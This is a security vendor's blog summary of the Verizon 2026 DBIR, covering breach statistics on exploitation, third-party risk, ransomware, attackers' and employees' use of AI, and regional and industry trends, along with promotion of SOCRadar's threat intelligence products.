Verizon 2026 DBIR: 10 Takeaways You Should Know

Verizon’s 2026 Data Breach Investigations Report (DBIR) analyzes more than 31,000 security incidents and 22,000 confirmed breaches across organizations in 145 countries, the largest breach dataset the report has ever examined. This 19th edition marks a clear inflection point: vulnerability exploitation has overtaken credential abuse as the most common initial access vector, generative AI is now a measurable part of the attacker toolkit, and third-party risk has surged to levels that can no longer be treated as a secondary concern. Whether you run a global enterprise or a 50-person company, the trends in this year’s report will reshape how you prioritize your defenses.

Below, we unpack the 10 most important takeaways from Verizon 2026 DBIR.

How Attack Patterns Have Shifted Since Last Year

Before diving in, here’s a quick look at how the distribution of breach patterns has changed year over year:

System Intrusion has tightened its grip at the top, now accounting for 61% of all breaches, reflecting the dominance of ransomware-driven, multi-step attack campaigns. Meanwhile, Basic Web Application Attacks fell significantly, which could indicate defenders are getting better at hardening web-facing surfaces, or simply that attackers have found more rewarding paths in. Social Engineering holds steady, and Privilege Misuse continues its gradual decline.

1. Vulnerability Exploitation Is Now the #1 Initial Access Vector

For years, stolen credentials were the attacker’s preferred front door. That era is now over. The 2026 DBIR reports that exploitation of vulnerabilities has risen to 31% of initial access vectors, a 55% increase over last year’s 20%, overtaking credential abuse for the first time.

The backdrop to this rise is a patching crisis that is getting worse, not better. Only 26% of CISA KEV vulnerabilities were fully remediated by organizations, down sharply from 38% the previous year. The median time to fully patch a known exploited vulnerability climbed to 43 days, nearly two weeks longer than in 2025. And the volume of vulnerabilities organizations need to patch has grown: the median number of KEV vulnerabilities per organization rose to 16 in 2025, up from 11 the year before, roughly 50% more work.

The practical message is clear: patch management is no longer just an IT hygiene issue. It is now the single most exploited gap attackers are walking through.

2. Third-Party Breaches Have Surged 60% in One Year

If there is one trend in the 2026 DBIR that should trigger an immediate review of your vendor relationships, it’s this: third-party involvement in breaches jumped 60% year over year, reaching 48% of all breaches, after having already doubled the year before.

The report identifies three distinct archetypes of third-party breach:

1. A vulnerability in a vendor’s software used as the initial access vector into your environment
2. A vendor that hosts your data being compromised directly
3. A vendor with a network or credential connection to your environment being used as a pivot point

All three showed up in high-profile 2025 campaigns. The report highlights how compromised OAuth tokens in the Salesloft Drift Salesforce plugin were leveraged to steal customer data from the platform, a case where breaching one third party cascaded into dozens of downstream victims.

The underlying security failures are often frustratingly basic: missing MFA on cloud accounts, excessive permissions, and weak password practices in third-party environments. Survival analysis of third-party cloud exposures shows that it takes almost eight months for 50% of weak password and permission misconfiguration findings to be resolved. Even MFA-related findings, widely acknowledged as a high-priority control, are fully remediated by only 23% of third-party organizations.

3. Ransomware Now Appears in Nearly Half of All Breaches

Ransomware is in 48% of all breaches this year, up from 44% in 2025. The absolute growth may look modest, but at this scale, it means ransomware is now embedded in virtually every threat category the DBIR tracks. In the System Intrusion pattern alone, Ransomware appears in 77% of breaches.

The financial picture around ransomware is more nuanced. The median ransom payment has continued its downward trend, now sitting at $139,875 (down from $150,000 the prior year), and 69% of ransomware victims chose not to pay, up from 65%. The report also presents new analysis showing that, when cross-referencing threat actor-disclosed victim lists with confirmed crypto wallet payments, only about 9% of publicized ransomware victims per group actually paid. This suggests many published victim lists may be exaggerated to bolster group credibility.

For defenders, a key tactical insight from this year’s data is the infostealer-to-ransomware pipeline: 50% of ransomware victims had a credential or infostealer leak event occur within 95 days before the ransomware attack. Monitoring stealer logs and dark web credential markets is increasingly an early-warning system for ransomware exposure.

4. Generative AI Is Now a Measurable Part of the Attacker Toolkit

Previous DBIRs maintained a healthy skepticism about whether AI usage by threat actors was actually moving the needle on real-world breaches. The 2026 edition, which includes original research conducted with Anthropic, marks a shift in that assessment.

Across 793 unique threat actors who violated Anthropic’s acceptable use policy with malicious cybersecurity activity, the median actor sought AI assistance for 15 distinct MITRE ATT&CK techniques, with some leveraging as many as 40 to 50. Phishing-related techniques were the leading category in AI-assisted initial access, accounting for 44% of observed techniques. Exploitation-related techniques came in at 32%, a concerning finding given vulnerability exploitation’s concurrent rise as the top initial access vector.

The key nuance: less than 2.5% of observed AI-assisted techniques involved rare or novel attack methods. AI is primarily being used to accelerate and scale techniques defenders already know how to detect, lowering the barrier for less sophisticated actors, not unlocking fundamentally new attack classes. The danger is that the “security poverty line” effect widens: even simple, well-understood attacks become more effective when they can be executed faster and at greater scale.

The Year in Review section includes December’s discovery of VoidLink, a malware framework written in six days by an AI agent, a marker of how quickly the automated threat development landscape is evolving.

5. Shadow AI Is the New Shadow IT

The insider risk landscape has a new and fast-growing dimension: Shadow AI. The DBIR reports that 67% of users are accessing AI platforms from non-corporate accounts on corporate devices. More strikingly, 45% of employees are now considered regular AI users on corporate devices, a threefold jump from 15% the prior year.

Shadow AI has become the third most common non-malicious insider action detected in DLP datasets, a fourfold increase in percentage from 2025. The most frequently submitted data type to unauthorized AI services was source code, followed by images and structured data. In 3.2% of DLP policy violations, research and technical documentation was uploaded to external AI systems, a meaningful intellectual property exposure risk.

The problem is compounded by browser AI plugins: the report finds that the average company has more than 15% of users with unauthorized AI extensions installed on their browsers, many of which collect browsing context including internal, non-public data.

6. Mobile-Centric Social Engineering Is 40% More Effective Than Email Phishing

Social Engineering accounts for 17% of breaches and was the third most common breach pattern in 2026. The headline finding this year is not the volume; it’s the shift in attack vectors and the measurable effectiveness gap that comes with it.

Phishing simulation data shows that mobile-centric attack vectors (voice calls and SMS) have a median success rate 40% higher than email phishing. The median email phishing simulation click rate is 1.4%; for phone-centric methods it is closer to 2%. While this difference may sound modest in isolation, at organizational scale it translates to a significantly larger pool of compromised users.

The report also documents the rise of Pretexting as an initial access vector for ransomware, a notable upgrade in attacker sophistication. Unlike asynchronous phishing emails, pretexting requires live interaction: a threat actor impersonating a help desk agent, a vendor, or an executive in real time to manipulate the victim into granting access. This includes the now-documented pattern of attackers flooding a user with spam to trigger a fake “help desk” outreach via Microsoft Teams, then using Quick Assist or other remote tools to gain access.

The ClickFix attack is another new variant worth tracking: malicious webpages present themselves as CAPTCHAs, then prompt users to paste a command into a terminal window, delivering malware while using social pressure to bypass caution.

7. SMBs: About 96% of Ransomware Victims Are Small Organizations

The notion that small and medium-sized businesses are too small to be worth targeting has been definitively put to rest. The 2026 DBIR finds that, of ransomware cases with known victim size information, about 96% of ransomware victims were SMBs.

This is not because large enterprises have solved ransomware. It’s because ransomware operators are largely opportunistic, and SMBs present an abundance of targets with unpatched edge devices (29% of SMB breaches involved exploited vulnerabilities in edge infrastructure), compromised credentials (38%), and more limited recovery capabilities.

The top three breach patterns for SMBs, System Intrusion, Basic Web Application Attacks, and Social Engineering, collectively account for 100% of SMB breaches. Third-party involvement was present in 55% of SMB breaches, meaning many small organizations are compromised through the vendors and software they rely on, not direct attacks on their own infrastructure.

SOCRadar’s Attack Surface Management (ASM) helps organizations identify exposed assets and unpatched vulnerabilities before attackers do, delivering enterprise-grade visibility without requiring an enterprise security team.

8. Espionage Surges in APAC; EMEA Tracks Closer to Global Norms

Regional trends in the 2026 DBIR tell a story of geopolitical pressure translating directly into breach activity.

In APAC, state-affiliated actors are responsible for 36% of breaches, more than any other region. Espionage motivation was present in 36% of APAC breaches (versus 13% globally), and Secrets data was compromised in 28% of APAC breaches versus 13% globally. System Intrusion accounts for 60% of APAC breaches, while Basic Web Application Attacks doubled year over year. The July 2025 breach of Qantas, affecting more than 5 million customers via a third-party platform, is highlighted as emblematic of this region’s exposure.

In EMEA, System Intrusion accounts for 57% of breaches, up slightly from 53% last year. State-affiliated actors are present in 23% of EMEA breaches (versus 14% globally), and Espionage-motivated breaches reach 27% in the region. The September 2025 ransomware attack on Jaguar Land Rover, described as the most economically damaging cyberattack in U.K. history at £1.9 billion in losses, illustrates how third-party and supply chain interconnections can turn a single ransomware event into an industry-wide disruption affecting approximately 5,000 downstream entities.

9. Industry Spotlight: Healthcare, Manufacturing, and Public Administration

Healthcare continues to struggle with a dual burden: externally driven ransomware and internally driven human error. Miscellaneous Errors has appeared in the top three breach patterns for Healthcare every single year the DBIR has tracked it, going back to 2014. The leading error types in 2026 are Misdelivery, Loss, and Misconfiguration, all of which have known, achievable mitigations that are simply not being implemented consistently.

System Intrusion is the top pattern, fueled in part by the Cl0p ransomware group’s exploitation of an Oracle E-Business Suite (EBS) zero-day in late 2025, which compromised Healthcare organizations among its more than 100 victims. Third-party involvement was present in 32% of Healthcare breaches.

Manufacturing saw notable growth in breach volume, with 2,713 confirmed breaches. Ransomware appeared in 61% of malware-related breaches, and exploitation of vulnerabilities was the leading initial access vector at 38%. Third-party involvement was exceptionally high at 61% of breaches.

Public Administration faces a uniquely complex threat profile: financially motivated organized crime on one side and state-aligned espionage actors (33% of breaches) on the other. Exploitation of vulnerabilities drives 82% of hacking-related breaches in government, and Internal actors account for 44% of all breaches in this sector, largely due to Misdelivery errors (which account for 88% of all errors in public administration) driven by the sheer volume of correspondence government entities generate.

10. A Look Back: The Year in Review for 2025

The DBIR’s Year in Review section documents twelve months of escalating threat activity that give important context to this year’s statistics.

• January-March set the tone with identity and edge infrastructure under siege: Chinese state actor Silk Typhoon compromised the U.S. Treasury by stealing a BeyondTrust security key; UNC5337 weaponized Ivanti Connect Secure zero-days to deploy the SPAWN malware ecosystem; and a supply chain attack cascaded through 23,000 GitHub Actions repositories. North Korea formally launched Research Center 227, a unit dedicated to AI-driven offensive hacking capabilities.
• April-June saw ransomware operators escalate toward maximum business disruption: Marks & Spencer, Co-op (6.5 million members’ data exposed), and Harrods were hit in rapid succession. Oracle Cloud suffered a claimed exfiltration of 6 million records. Operation Endgame disrupted Lumma Stealer infrastructure across 1,300 domains, but developers restored operations within days.
• July-September brought infrastructure attacks with historic financial consequences: the JLR ransomware attack (£1.9 billion), CitrixBleed 2, and the ShinyHuntersSalesloft/Salesforce supply chain campaign targeting Google, Zscaler, and Cisco. Amazon revealed it had blocked more than 1,800 North Korean “remote worker” infiltration attempts.
• October-December closed the year with record-breaking DDoS volume (the Aisuru botnet reached a peak of 29.7 Tbps), the emergence of PromptLock, the first AI-powered ransomware to generate cross-platform encryption scripts dynamically via local LLMs, and VoidLink, a malware framework built by an AI agent in six days, which the report describes as “a point of no return for automated threat development.”

Conclusion

The 2026 Verizon DBIR delivers a clear and consistent message: the fundamentals matter more than ever, even as the threat landscape accelerates in complexity. The key themes this year:

• Vulnerability management is the new credential hygiene – exploitation has overtaken stolen credentials as the top initial access vector, and patching backlogs are growing faster than remediation capacity.
• Third-party risk is no longer a secondary concern – at 48% of all breaches and growing 60% year over year, vendor and supply chain exposure is now a primary attack surface.
• Ransomware is ubiquitous – 48% of all breaches, about 96% of ransomware victims are SMBs, and the infostealer-to-ransomware pipeline is shortening the window between credential theft and full compromise.
• AI is operational for attackers – GenAI is accelerating the scale and accessibility of known techniques, and the first fully AI-developed malware frameworks have appeared.
• Shadow AI is a new data loss vector – 67% of users are accessing AI from non-corporate accounts on corporate devices, with source code as the most commonly exposed data type.

SOCRadar’s Extended Threat Intelligence platform helps organizations address each of these vectors, from monitoring Dark Web stealer logs for pre-ransomware credential exposure, to tracking third-party risk posture, to vulnerability intelligence that prioritizes patching based on active exploitation signals.In an environment where the margin between an early warning and a confirmed breach is measured in days, proactive visibility is the critical differentiator.

For the full dataset and methodology, see the Verizon 2026 DBIR.